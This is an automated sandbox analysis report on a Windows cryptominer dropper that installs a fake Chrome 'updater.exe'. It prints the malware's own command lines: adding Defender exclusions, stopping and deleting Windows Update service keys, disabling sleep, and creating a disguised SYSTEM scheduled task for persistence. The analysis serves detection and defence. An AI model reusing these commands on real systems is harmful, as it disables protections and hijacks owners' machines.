Analysis
-
max time kernel
301s -
max time network
298s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-09-2022 06:18
Behavioral task
behavioral1
Sample
reav.exe
Resource
win7-20220812-en
General
-
Target
reav.exe
-
Size
7.0MB
-
MD5
4c7bc4f742346f6f5506660175637a70
-
SHA1
b1c87e4395474abb15a1c6bf785bee77adfaefa5
-
SHA256
0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d
-
SHA512
fdb83490b218672b0ebf32d2e9168d89865efe0373468974d05ed3fe1ac1a22c986f0e75a746da4002db280d03376179805e92b2c2a8700a90c85238231a6b29
-
SSDEEP
196608:SIcrtGJOI5qLOKdTn8a9tcpAbe+wOlWd1wUgETPCO67:SIchGlepn8+Ag6wUhPx67
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exereav.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ reav.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
reav.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts reav.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1728 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
reav.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion reav.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion reav.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1752 taskeng.exe -
Processes:
resource yara_rule behavioral1/memory/1476-54-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-55-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-57-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-58-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-59-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-60-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-61-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida behavioral1/memory/1476-98-0x000000013F4D0000-0x00000001401B9000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1728-113-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-114-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-115-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-119-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-118-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-117-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-116-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-125-0x000000013FF50000-0x0000000140C39000-memory.dmp themida behavioral1/memory/1728-160-0x000000013FF50000-0x0000000140C39000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
reav.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reav.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
reav.exeupdater.exepid process 1476 reav.exe 1728 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1728 set thread context of 1276 1728 updater.exe conhost.exe PID 1728 set thread context of 1932 1728 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
reav.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe reav.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 552 sc.exe 1508 sc.exe 912 sc.exe 2036 sc.exe 288 sc.exe 1692 sc.exe 1488 sc.exe 2036 sc.exe 2004 sc.exe 1468 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d002082425cfd801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 604 powershell.exe 1816 powershell.exe 776 powershell.exe 1328 powershell.exe 896 powershell.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe 1932 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 604 powershell.exe Token: SeShutdownPrivilege 1788 powercfg.exe Token: SeShutdownPrivilege 1432 powercfg.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeShutdownPrivilege 1136 powercfg.exe Token: SeShutdownPrivilege 2012 powercfg.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeShutdownPrivilege 1528 powercfg.exe Token: SeShutdownPrivilege 308 powercfg.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeShutdownPrivilege 1280 powercfg.exe Token: SeShutdownPrivilege 2032 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: SeLockMemoryPrivilege 1932 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
reav.execmd.execmd.exepowershell.exepowershell.exetaskeng.exedescription pid process target process PID 1476 wrote to memory of 604 1476 reav.exe powershell.exe PID 1476 wrote to memory of 604 1476 reav.exe powershell.exe PID 1476 wrote to memory of 604 1476 reav.exe powershell.exe PID 1476 wrote to memory of 1100 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1100 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1100 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1620 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1620 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1620 1476 reav.exe cmd.exe PID 1476 wrote to memory of 1816 1476 reav.exe powershell.exe PID 1476 wrote to memory of 1816 1476 reav.exe powershell.exe PID 1476 wrote to memory of 1816 1476 reav.exe powershell.exe PID 1620 wrote to memory of 1788 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1788 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1788 1620 cmd.exe powercfg.exe PID 1100 wrote to memory of 552 1100 cmd.exe sc.exe PID 1100 wrote to memory of 552 1100 cmd.exe sc.exe PID 1100 wrote to memory of 552 1100 cmd.exe sc.exe PID 1100 wrote to memory of 1508 1100 cmd.exe sc.exe PID 1100 wrote to memory of 1508 1100 cmd.exe sc.exe PID 1100 wrote to memory of 1508 1100 cmd.exe sc.exe PID 1620 wrote to memory of 1432 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1432 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1432 1620 cmd.exe powercfg.exe PID 1100 wrote to memory of 912 1100 cmd.exe sc.exe PID 1100 wrote to memory of 912 1100 cmd.exe sc.exe PID 1100 wrote to memory of 912 1100 cmd.exe sc.exe PID 1100 wrote to memory of 2036 1100 cmd.exe sc.exe PID 1100 wrote to memory of 2036 1100 cmd.exe sc.exe PID 1100 wrote to memory of 2036 1100 cmd.exe sc.exe PID 1620 wrote to memory of 1136 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1136 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 1136 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 2012 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 2012 1620 cmd.exe powercfg.exe PID 1620 wrote to memory of 2012 1620 cmd.exe powercfg.exe PID 1100 wrote to memory of 288 1100 cmd.exe sc.exe PID 1100 wrote to memory of 288 1100 cmd.exe sc.exe PID 1100 wrote to memory of 288 1100 cmd.exe sc.exe PID 1100 wrote to memory of 1056 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1056 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1056 1100 cmd.exe reg.exe PID 1100 wrote to memory of 2004 1100 cmd.exe reg.exe PID 1100 wrote to memory of 2004 1100 cmd.exe reg.exe PID 1100 wrote to memory of 2004 1100 cmd.exe reg.exe PID 1100 wrote to memory of 952 1100 cmd.exe reg.exe PID 1100 wrote to memory of 952 1100 cmd.exe reg.exe PID 1100 wrote to memory of 952 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1724 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1724 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1724 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1468 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1468 1100 cmd.exe reg.exe PID 1100 wrote to memory of 1468 1100 cmd.exe reg.exe PID 1816 wrote to memory of 336 1816 powershell.exe schtasks.exe PID 1816 wrote to memory of 336 1816 powershell.exe schtasks.exe PID 1816 wrote to memory of 336 1816 powershell.exe schtasks.exe PID 1476 wrote to memory of 776 1476 reav.exe powershell.exe PID 1476 wrote to memory of 776 1476 reav.exe powershell.exe PID 1476 wrote to memory of 776 1476 reav.exe powershell.exe PID 776 wrote to memory of 856 776 powershell.exe schtasks.exe PID 776 wrote to memory of 856 776 powershell.exe schtasks.exe PID 776 wrote to memory of 856 776 powershell.exe schtasks.exe PID 1752 wrote to memory of 1728 1752 taskeng.exe updater.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\reav.exe"C:\Users\Admin\AppData\Local\Temp\reav.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#mlvtn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {3E707C90-E72A-4641-AA9B-F9FF3437E5D1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe hcrjlvsp3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dmxihflldgatbxwx GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gdioqe8NBSKYuPqRQikB1LSNDCZ707F9ASg+mgAaJFy3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD58ae770bdb0a2d1babcc9642c82fd92a3
SHA12032658e2249a90f703dedffad238e9cb61c1278
SHA2561626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
SHA51226317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD58ae770bdb0a2d1babcc9642c82fd92a3
SHA12032658e2249a90f703dedffad238e9cb61c1278
SHA2561626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
SHA51226317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5bb0a9330b4f8abbacc66864911969952
SHA1f0f95b97434b36dff0a968899682c067ba0b7bdc
SHA256aee27dd7594b35cda8dc9cc90f916b58b57c46b220a9e62d13cdf5b1a439966f
SHA512c4172ac321dfc5720049ddc60495211e32b36cc55a53cbcc482e4737b8b11a11ddd05a48b626205e1bcc1991e8971c74e125a3692bb9c0f0ecb035d5e9876714
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5bb0a9330b4f8abbacc66864911969952
SHA1f0f95b97434b36dff0a968899682c067ba0b7bdc
SHA256aee27dd7594b35cda8dc9cc90f916b58b57c46b220a9e62d13cdf5b1a439966f
SHA512c4172ac321dfc5720049ddc60495211e32b36cc55a53cbcc482e4737b8b11a11ddd05a48b626205e1bcc1991e8971c74e125a3692bb9c0f0ecb035d5e9876714
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5a774fd7a4b22e14cb51baf5273b7c9f2
SHA19a3dab13bb04a2175953f7aea36de83bfb219695
SHA256e2e064f7101eff07df08618ea418f00273219b1af8cce23e0a22f000b2cbd263
SHA512a8c14ff733d8982ae2b75ed914c94295ea60ceb9c069479923b6136e817c1f33c791dacde98636f04d0c0aecff5c31e8f7423f9e8a69578e072e49d0bdc86e8c
-
\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD58ae770bdb0a2d1babcc9642c82fd92a3
SHA12032658e2249a90f703dedffad238e9cb61c1278
SHA2561626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
SHA51226317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad
-
memory/288-85-0x0000000000000000-mapping.dmp
-
memory/308-136-0x0000000000000000-mapping.dmp
-
memory/336-93-0x0000000000000000-mapping.dmp
-
memory/552-75-0x0000000000000000-mapping.dmp
-
memory/552-129-0x0000000000000000-mapping.dmp
-
memory/604-66-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmpFilesize
11.4MB
-
memory/604-67-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
